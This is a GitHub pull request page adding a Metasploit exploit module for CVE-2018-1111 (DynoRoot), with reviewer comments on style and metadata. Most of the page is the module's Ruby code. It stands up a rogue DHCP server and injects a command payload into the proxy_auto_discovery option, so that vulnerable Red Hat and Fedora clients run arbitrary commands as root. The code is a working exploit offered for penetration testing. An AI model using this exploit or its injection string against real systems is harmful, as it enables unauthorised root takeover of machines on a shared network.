-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add CVE-2018-1111 exploit #10059
Add CVE-2018-1111 exploit #10059
Changes from 12 commits
164f3ef
f1b9088
8f02423
35ee1b5
0951aca
599979b
1efa5c4
6d0c6a7
b0f5566
4bf259e
d9d2263
f2549a1
c665a32
93e9c96
File filter
Filter by extension
Conversations
Jump to
Diff view
Diff view
There are no files selected for viewing
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,67 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = ExcellentRanking | ||
|
||
include Msf::Exploit::Remote::DHCPServer | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'DHCP Client Command Injection (DynoRoot)', | ||
'Description' => %q{ | ||
This module exploits the DynoRoot vulnerability, a flaw in how the | ||
NetworkManager integration script included in the DHCP client in | ||
Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier | ||
processes DHCP options. A malicious DHCP server, or an attacker on | ||
the local network able to spoof DHCP responses, could use this flaw | ||
to execute arbitrary commands with root privileges on systems using | ||
NetworkManager and configured to obtain network configuration using | ||
the DHCP protocol. | ||
}, | ||
'Author' => | ||
[ | ||
'Felix Wilhelm', # Vulnerability discovery | ||
'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>' # Metasploit module | ||
], | ||
'License' => MSF_LICENSE, | ||
'Platform' => ['unix'], | ||
'Arch' => ARCH_CMD, | ||
'References' => | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Feel free to include your own PoC in this array. :) There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. I'd add an There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Added |
||
[ | ||
['CVE', '2018-1111'], | ||
['EDB': '44652'], | ||
['URL', 'https://github.com/kkirsche/CVE-2018-1111'], | ||
['URL', 'https://twitter.com/_fel1x/status/996388421273882626?lang=en'], | ||
['URL', 'https://access.redhat.com/security/vulnerabilities/3442151'], | ||
['AKA', 'DynoRoot'], | ||
['URL', 'https://dynoroot.ninja/'], | ||
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'], | ||
['URL', 'https://www.tenable.com/blog/advisory-red-hat-dhcp-client-command-injection-trouble'], | ||
['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111'] | ||
], | ||
'PayloadType': 'cmd', | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. This should be a hash rocket for consistency
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Fixed |
||
'Targets' => [ [ 'Automatic Target', { }] ], | ||
'DefaultTarget' => 0, | ||
'DisclosureDate' => 'May 15 2018' | ||
)) | ||
|
||
deregister_options('DOMAINNAME', 'HOSTNAME', 'URL', 'FILENAME') | ||
end | ||
|
||
def exploit | ||
hash = datastore.copy | ||
start_service(hash) | ||
@dhcp.set_option(proxy_auto_discovery: "#{Rex::Text.rand_text_alpha(6..12)}'&#{payload.encoded} #") | ||
|
||
begin | ||
while @dhcp.thread.alive? | ||
sleep 2 | ||
end | ||
ensure | ||
stop_service | ||
end | ||
end | ||
end |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
You can add a
'Privileged' => true,
key to this hash somewhere, to show off that your exploit gives remote r00t.There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Fixed